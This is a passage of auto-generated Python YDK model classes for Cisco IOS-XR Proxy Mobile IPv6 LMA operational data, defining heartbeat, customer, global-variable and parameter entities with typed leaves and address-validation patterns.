**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: vrf
VRF Name
**type**\: str
.. attribute:: customer_name
Customer Name
**type**\: str
.. attribute:: source_port
Source Port
**type**\: int
**range:** 0..4294967295
.. attribute:: destination_port
Destination Port
**type**\: int
**range:** 0..4294967295
.. attribute:: source_ipv4_address
Source IPv4 Address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: destination_ipv4_address
Destination IPv4 Address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: source_ipv6_address
Source IPv6 Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: destination_ipv6_address
Destination IPv6 Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: status
Path Status
**type**\: bool
.. attribute:: ipv6_path
IPv6 Path
**type**\: bool
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Heartbeats.Heartbeat, self).__init__()
self.yang_name = "heartbeat"
self.yang_parent_name = "heartbeats"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['peer_addr']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('peer_addr', (YLeaf(YType.str, 'peer-addr'), ['str','str'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('customer_name', (YLeaf(YType.str, 'customer-name'), ['str'])),
('source_port', (YLeaf(YType.uint32, 'source-port'), ['int'])),
('destination_port', (YLeaf(YType.uint32, 'destination-port'), ['int'])),
('source_ipv4_address', (YLeaf(YType.str, 'source-ipv4-address'), ['str'])),
('destination_ipv4_address', (YLeaf(YType.str, 'destination-ipv4-address'), ['str'])),
('source_ipv6_address', (YLeaf(YType.str, 'source-ipv6-address'), ['str'])),
('destination_ipv6_address', (YLeaf(YType.str, 'destination-ipv6-address'), ['str'])),
('status', (YLeaf(YType.boolean, 'status'), ['bool'])),
('ipv6_path', (YLeaf(YType.boolean, 'ipv6-path'), ['bool'])),
])
self.peer_addr = None
self.vrf = None
self.customer_name = None
self.source_port = None
self.destination_port = None
self.source_ipv4_address = None
self.destination_ipv4_address = None
self.source_ipv6_address = None
self.destination_ipv6_address = None
self.status = None
self.ipv6_path = None
self._segment_path = lambda: "heartbeat" + "[peer-addr='" + str(self.peer_addr) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/heartbeats/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Heartbeats.Heartbeat, ['peer_addr', 'vrf', 'customer_name', 'source_port', 'destination_port', 'source_ipv4_address', 'destination_ipv4_address', 'source_ipv6_address', 'destination_ipv6_address', 'status', 'ipv6_path'], name, value)
class ConfigVariables(Entity):
"""
Global Configuration Variables
.. attribute:: customer_variables
Table of CustomerVariables
**type**\: :py:class:`CustomerVariables <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.CustomerVariables>`
.. attribute:: global_variables
Global Configuration Variables
**type**\: :py:class:`GlobalVariables <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables, self).__init__()
self.yang_name = "config-variables"
self.yang_parent_name = "lma"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("customer-variables", ("customer_variables", Pmipv6.Lma.ConfigVariables.CustomerVariables)), ("global-variables", ("global_variables", Pmipv6.Lma.ConfigVariables.GlobalVariables))])
self._leafs = OrderedDict()
self.customer_variables = Pmipv6.Lma.ConfigVariables.CustomerVariables()
self.customer_variables.parent = self
self._children_name_map["customer_variables"] = "customer-variables"
self.global_variables = Pmipv6.Lma.ConfigVariables.GlobalVariables()
self.global_variables.parent = self
self._children_name_map["global_variables"] = "global-variables"
self._segment_path = lambda: "config-variables"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables, [], name, value)
class CustomerVariables(Entity):
"""
Table of CustomerVariables
.. attribute:: customer_variable
Customer name string
**type**\: list of :py:class:`CustomerVariable <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.CustomerVariables, self).__init__()
self.yang_name = "customer-variables"
self.yang_parent_name = "config-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("customer-variable", ("customer_variable", Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable))])
self._leafs = OrderedDict()
self.customer_variable = YList(self)
self._segment_path = lambda: "customer-variables"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.CustomerVariables, [], name, value)
class CustomerVariable(Entity):
"""
Customer name string
.. attribute:: customer_name (key)
Customer name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: mll_service
MLL service parameters
**type**\: :py:class:`MllService <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService>`
.. attribute:: cust_name
Customer Name
**type**\: str
.. attribute:: vrf_name
VRF Name
**type**\: str
.. attribute:: auth_option
Authentication Option
**type**\: bool
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable, self).__init__()
self.yang_name = "customer-variable"
self.yang_parent_name = "customer-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['customer_name']
self._child_classes = OrderedDict([("mll-service", ("mll_service", Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService))])
self._leafs = OrderedDict([
('customer_name', (YLeaf(YType.str, 'customer-name'), ['str'])),
('cust_name', (YLeaf(YType.str, 'cust-name'), ['str'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('auth_option', (YLeaf(YType.boolean, 'auth-option'), ['bool'])),
])
self.customer_name = None
self.cust_name = None
self.vrf_name = None
self.auth_option = None
self.mll_service = Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService()
self.mll_service.parent = self
self._children_name_map["mll_service"] = "mll-service"
self._segment_path = lambda: "customer-variable" + "[customer-name='" + str(self.customer_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/customer-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable, ['customer_name', 'cust_name', 'vrf_name', 'auth_option'], name, value)
class MllService(Entity):
"""
MLL service parameters
.. attribute:: ignore_hoa
Ignore Home Address
**type**\: bool
.. attribute:: mnp_ipv4_lmn_max
Max IPv4 prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_ipv6_lmn_max
Max IPv6 prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_lmn_max
Max prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_ipv4_cust_max
Max IPv4 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv6_cust_max
Max IPv6 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_cust_max
Max prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv4_cust_cur
Current IPv4 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv6_cust_cur
Current IPv6 prefixes per Customer
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService, self).__init__()
self.yang_name = "mll-service"
self.yang_parent_name = "customer-variable"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ignore_hoa', (YLeaf(YType.boolean, 'ignore-hoa'), ['bool'])),
('mnp_ipv4_lmn_max', (YLeaf(YType.uint16, 'mnp-ipv4-lmn-max'), ['int'])),
('mnp_ipv6_lmn_max', (YLeaf(YType.uint16, 'mnp-ipv6-lmn-max'), ['int'])),
('mnp_lmn_max', (YLeaf(YType.uint16, 'mnp-lmn-max'), ['int'])),
('mnp_ipv4_cust_max', (YLeaf(YType.uint32, 'mnp-ipv4-cust-max'), ['int'])),
('mnp_ipv6_cust_max', (YLeaf(YType.uint32, 'mnp-ipv6-cust-max'), ['int'])),
('mnp_cust_max', (YLeaf(YType.uint32, 'mnp-cust-max'), ['int'])),
('mnp_ipv4_cust_cur', (YLeaf(YType.uint32, 'mnp-ipv4-cust-cur'), ['int'])),
('mnp_ipv6_cust_cur', (YLeaf(YType.uint32, 'mnp-ipv6-cust-cur'), ['int'])),
])
self.ignore_hoa = None
self.mnp_ipv4_lmn_max = None
self.mnp_ipv6_lmn_max = None
self.mnp_lmn_max = None
self.mnp_ipv4_cust_max = None
self.mnp_ipv6_cust_max = None
self.mnp_cust_max = None
self.mnp_ipv4_cust_cur = None
self.mnp_ipv6_cust_cur = None
self._segment_path = lambda: "mll-service"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService, ['ignore_hoa', 'mnp_ipv4_lmn_max', 'mnp_ipv6_lmn_max', 'mnp_lmn_max', 'mnp_ipv4_cust_max', 'mnp_ipv6_cust_max', 'mnp_cust_max', 'mnp_ipv4_cust_cur', 'mnp_ipv6_cust_cur'], name, value)
class GlobalVariables(Entity):
"""
Global Configuration Variables
.. attribute:: parameters
Domain Parameters
**type**\: :py:class:`Parameters <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters>`
.. attribute:: mll_service
MLL service parameters
**type**\: :py:class:`MllService <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService>`
.. attribute:: domain
Domain Name
**type**\: str
.. attribute:: selfid
Self ID
**type**\: str
.. attribute:: apn_name
APN Name
**type**\: str
.. attribute:: role
Role Type
**type**\: :py:class:`Pmipv6Role <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6Role>`
.. attribute:: count
Number of Networks/Intf
**type**\: int
**range:** 0..4294967295
.. attribute:: peers
Number of Peers
**type**\: int
**range:** 0..4294967295
.. attribute:: customers
Number of Customers
**type**\: int
**range:** 0..4294967295
.. attribute:: num_network
Number of Networks
**type**\: int
**range:** 0..4294967295
.. attribute:: discover_mn
Discover MN Detachment
**type**\: bool
.. attribute:: local_routing
Local Routing
**type**\: bool
.. attribute:: aaa_accounting
AAA Accounting
**type**\: bool
.. attribute:: default_mn
Default MN Enabled
**type**\: bool
.. attribute:: apn
APN Present
**type**\: bool
.. attribute:: learn_mag
Learn MAG
**type**\: bool
.. attribute:: session_mgr
Session Manager
**type**\: bool
.. attribute:: service
Service
**type**\: int
**range:** 0..255
.. attribute:: profile
Default MN Profile Name
**type**\: str
.. attribute:: ddp
Discover Detach Period
**type**\: int
**range:** 0..4294967295
.. attribute:: ddt
Discover Detach Timeout
**type**\: int
**range:** 0..4294967295
.. attribute:: ddr
Discover Detach Retries
**type**\: int
**range:** 0..255
.. attribute:: intf
MAG Access List
**type**\: list of :py:class:`Intf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Intf>`
.. attribute:: peer
Peer Parameters
**type**\: list of :py:class:`Peer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Peer>`
.. attribute:: network
LMA Network Parameters
**type**\: list of :py:class:`Network <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Network>`
.. attribute:: cust
Customer parameters
**type**\: list of :py:class:`Cust <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Cust>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables, self).__init__()
self.yang_name = "global-variables"
self.yang_parent_name = "config-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("parameters", ("parameters", Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters)), ("mll-service", ("mll_service", Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService)), ("intf", ("intf", Pmipv6.Lma.ConfigVariables.GlobalVariables.Intf)), ("peer", ("peer", Pmipv6.Lma.ConfigVariables.GlobalVariables.Peer)), ("network", ("network", Pmipv6.Lma.ConfigVariables.GlobalVariables.Network)), ("cust", ("cust", Pmipv6.Lma.ConfigVariables.GlobalVariables.Cust))])
self._leafs = OrderedDict([
('domain', (YLeaf(YType.str, 'domain'), ['str'])),
('selfid', (YLeaf(YType.str, 'selfid'), ['str'])),
('apn_name', (YLeaf(YType.str, 'apn-name'), ['str'])),
('role', (YLeaf(YType.enumeration, 'role'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper', 'Pmipv6Role', '')])),
('count', (YLeaf(YType.uint32, 'count'), ['int'])),
('peers', (YLeaf(YType.uint32, 'peers'), ['int'])),
('customers', (YLeaf(YType.uint32, 'customers'), ['int'])),
('num_network', (YLeaf(YType.uint32, 'num-network'), ['int'])),
('discover_mn', (YLeaf(YType.boolean, 'discover-mn'), ['bool'])),
('local_routing', (YLeaf(YType.boolean, 'local-routing'), ['bool'])),
('aaa_accounting', (YLeaf(YType.boolean, 'aaa-accounting'), ['bool'])),
('default_mn', (YLeaf(YType.boolean, 'default-mn'), ['bool'])),
('apn', (YLeaf(YType.boolean, 'apn'), ['bool'])),
('learn_mag', (YLeaf(YType.boolean, 'learn-mag'), ['bool'])),
('session_mgr', (YLeaf(YType.boolean, 'session-mgr'), ['bool'])),
('service', (YLeaf(YType.uint8, 'service'), ['int'])),
('profile', (YLeaf(YType.str, 'profile'), ['str'])),
('ddp', (YLeaf(YType.uint32, 'ddp'), ['int'])),
('ddt', (YLeaf(YType.uint32, 'ddt'), ['int'])),
('ddr', (YLeaf(YType.uint8, 'ddr'), ['int'])),
])
self.domain = None
self.selfid = None
self.apn_name = None
self.role = None
self.count = None
self.peers = None
self.customers = None
self.num_network = None
self.discover_mn = None
self.local_routing = None
self.aaa_accounting = None
self.default_mn = None
self.apn = None
self.learn_mag = None
self.session_mgr = None
self.service = None
self.profile = None
self.ddp = None
self.ddt = None
self.ddr = None
self.parameters = Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters()
self.parameters.parent = self
self._children_name_map["parameters"] = "parameters"
self.mll_service = Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService()
self.mll_service.parent = self
self._children_name_map["mll_service"] = "mll-service"
self.intf = YList(self)
self.peer = YList(self)
self.network = YList(self)
self.cust = YList(self)
self._segment_path = lambda: "global-variables"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables, ['domain', 'selfid', 'apn_name', 'role', 'count', 'peers', 'customers', 'num_network', 'discover_mn', 'local_routing', 'aaa_accounting', 'default_mn', 'apn', 'learn_mag', 'session_mgr', 'service', 'profile', 'ddp', 'ddt', 'ddr'], name, value)
class Parameters(Entity):
"""
Domain Parameters
.. attribute:: self_id
Self Identifier
**type**\: :py:class:`SelfId <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId>`
.. attribute:: timestamp
Timestamp method in use
**type**\: bool
.. attribute:: window
Timestamp Validity Window
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: auth_option
Authentication Option
**type**\: bool
.. attribute:: reg_time
BCE Registration Lifetime
**type**\: int
**range:** 0..4294967295
.. attribute:: ref_time
BCE Refresh Time
**type**\: int
**range:** 0..4294967295
.. attribute:: retx
Refresh Retransmit Init
**type**\: int
**range:** 0..65535
.. attribute:: ret_max
Refresh Retransmit Max
**type**\: int
**range:** 0..65535
.. attribute:: bri_init
BRI Init Delay time
**type**\: int
**range:** 0..65535
.. attribute:: bri_retries
BRI Max Retries
**type**\: int
**range:** 0..65535
.. attribute:: bri_max
BRI Max Delay time
**type**\: int
**range:** 0..65535
.. attribute:: max_bindings
Allowed Max. Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: hnp
Allowed HNPs per MN Intf
**type**\: int
**range:** 0..255
.. attribute:: encap
Encapsulation Type
**type**\: :py:class:`Pmipv6Encap <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6Encap>`
.. attribute:: delete_time
BCE Delete Hold Timer
**type**\: int
**range:** 0..65535
.. attribute:: create_time
BCE Create Wait Timer
**type**\: int
**range:** 0..65535
.. attribute:: up_grekey
Upstream GRE Key
**type**\: int
**range:** 0..4294967295
.. attribute:: down_grekey
Downstream GRE Key
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters, self).__init__()
self.yang_name = "parameters"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("self-id", ("self_id", Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId))])
self._leafs = OrderedDict([
('timestamp', (YLeaf(YType.boolean, 'timestamp'), ['bool'])),
('window', (YLeaf(YType.uint64, 'window'), ['int'])),
('auth_option', (YLeaf(YType.boolean, 'auth-option'), ['bool'])),
('reg_time', (YLeaf(YType.uint32, 'reg-time'), ['int'])),
('ref_time', (YLeaf(YType.uint32, 'ref-time'), ['int'])),
('retx', (YLeaf(YType.uint16, 'retx'), ['int'])),
('ret_max', (YLeaf(YType.uint16, 'ret-max'), ['int'])),
('bri_init', (YLeaf(YType.uint16, 'bri-init'), ['int'])),
('bri_retries', (YLeaf(YType.uint16, 'bri-retries'), ['int'])),
('bri_max', (YLeaf(YType.uint16, 'bri-max'), ['int'])),
('max_bindings', (YLeaf(YType.uint32, 'max-bindings'), ['int'])),
('hnp', (YLeaf(YType.uint8, 'hnp'), ['int'])),
('encap', (YLeaf(YType.enumeration, 'encap'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper', 'Pmipv6Encap', '')])),
('delete_time', (YLeaf(YType.uint16, 'delete-time'), ['int'])),
('create_time', (YLeaf(YType.uint16, 'create-time'), ['int'])),
('up_grekey', (YLeaf(YType.uint32, 'up-grekey'), ['int'])),
('down_grekey', (YLeaf(YType.uint32, 'down-grekey'), ['int'])),
])
self.timestamp = None
self.window = None
self.auth_option = None
self.reg_time = None
self.ref_time = None
self.retx = None
self.ret_max = None
self.bri_init = None
self.bri_retries = None
self.bri_max = None
self.max_bindings = None
self.hnp = None
self.encap = None
self.delete_time = None
self.create_time = None
self.up_grekey = None
self.down_grekey = None
self.self_id = Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId()
self.self_id.parent = self
self._children_name_map["self_id"] = "self-id"
self._segment_path = lambda: "parameters"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters, ['timestamp', 'window', 'auth_option', 'reg_time', 'ref_time', 'retx', 'ret_max', 'bri_init', 'bri_retries', 'bri_max', 'max_bindings', 'hnp', 'encap', 'delete_time', 'create_time', 'up_grekey', 'down_grekey'], name, value)
class SelfId(Entity):
"""
Self Identifier
.. attribute:: entity_
Identifier of PMIP Node
**type**\: str
.. attribute:: addr_type
IPV4 or IPV6 or Both
**type**\: :py:class:`Pmipv6Addr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6Addr>`
.. attribute:: address
IPV6 address of LMA/MAG
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv4_address
IPV4 addrress of LMA/MAG
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId, self).__init__()
self.yang_name = "self-id"
self.yang_parent_name = "parameters"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('entity_', (YLeaf(YType.str, 'entity'), ['str'])),
('addr_type', (YLeaf(YType.enumeration, 'addr-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper', 'Pmipv6Addr', '')])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
])
self.entity_ = None
self.addr_type = None
self.address = None
self.ipv4_address = None
self._segment_path = lambda: "self-id"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/parameters/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId, ['entity_', 'addr_type', 'address', 'ipv4_address'], name, value)
class MllService(Entity):
"""
MLL service parameters
.. attribute:: ignore_hoa
Ignore Home Address
**type**\: bool
.. attribute:: mnp_ipv4_lmn_max
Max IPv4 prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_ipv6_lmn_max
Max IPv6 prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_lmn_max
Max prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_ipv4_cust_max
Max IPv4 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv6_cust_max
Max IPv6 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_cust_max
Max prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv4_cust_cur
Current IPv4 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv6_cust_cur
Current IPv6 prefixes per Customer
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService, self).__init__()
self.yang_name = "mll-service"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ignore_hoa', (YLeaf(YType.boolean, 'ignore-hoa'), ['bool'])),
('mnp_ipv4_lmn_max', (YLeaf(YType.uint16, 'mnp-ipv4-lmn-max'), ['int'])),
('mnp_ipv6_lmn_max', (YLeaf(YType.uint16, 'mnp-ipv6-lmn-max'), ['int'])),
('mnp_lmn_max', (YLeaf(YType.uint16, 'mnp-lmn-max'), ['int'])),
('mnp_ipv4_cust_max', (YLeaf(YType.uint32, 'mnp-ipv4-cust-max'), ['int'])),
('mnp_ipv6_cust_max', (YLeaf(YType.uint32, 'mnp-ipv6-cust-max'), ['int'])),
('mnp_cust_max', (YLeaf(YType.uint32, 'mnp-cust-max'), ['int'])),
('mnp_ipv4_cust_cur', (YLeaf(YType.uint32, 'mnp-ipv4-cust-cur'), ['int'])),
('mnp_ipv6_cust_cur', (YLeaf(YType.uint32, 'mnp-ipv6-cust-cur'), ['int'])),
])
self.ignore_hoa = None
self.mnp_ipv4_lmn_max = None
self.mnp_ipv6_lmn_max = None
self.mnp_lmn_max = None
self.mnp_ipv4_cust_max = None
self.mnp_ipv6_cust_max = None
self.mnp_cust_max = None
self.mnp_ipv4_cust_cur = None
self.mnp_ipv6_cust_cur = None
self._segment_path = lambda: "mll-service"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService, ['ignore_hoa', 'mnp_ipv4_lmn_max', 'mnp_ipv6_lmn_max', 'mnp_lmn_max', 'mnp_ipv4_cust_max', 'mnp_ipv6_cust_max', 'mnp_cust_max', 'mnp_ipv4_cust_cur', 'mnp_ipv6_cust_cur'], name, value)
class Intf(Entity):
"""
MAG Access List
.. attribute:: apn
APN Present
**type**\: bool
.. attribute:: interface
Access Interface Name
**type**\: str
.. attribute:: apn_name
APN Name
**type**\: str
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Intf, self).__init__()
self.yang_name = "intf"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('apn', (YLeaf(YType.boolean, 'apn'), ['bool'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('apn_name', (YLeaf(YType.str, 'apn-name'), ['str'])),
])
self.apn = None
self.interface = None
self.apn_name = None
self._segment_path = lambda: "intf"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Intf, ['apn', 'interface', 'apn_name'], name, value)
class Peer(Entity):
"""
Peer Parameters
.. attribute:: peer
Peer Name
**type**\: str
.. attribute:: vrf_name
VRF Name
**type**\: str
.. attribute:: interface
Peer static tunnel intf
**type**\: str
.. attribute:: encap
Encapsulation Type
**type**\: :py:class:`Pmipv6Encap <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6Encap>`
.. attribute:: auth
Authentication Option
**type**\: bool
.. attribute:: vrf
VRF Present
**type**\: bool
.. attribute:: statictunnel
Static tunnel Present
**type**\: bool
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
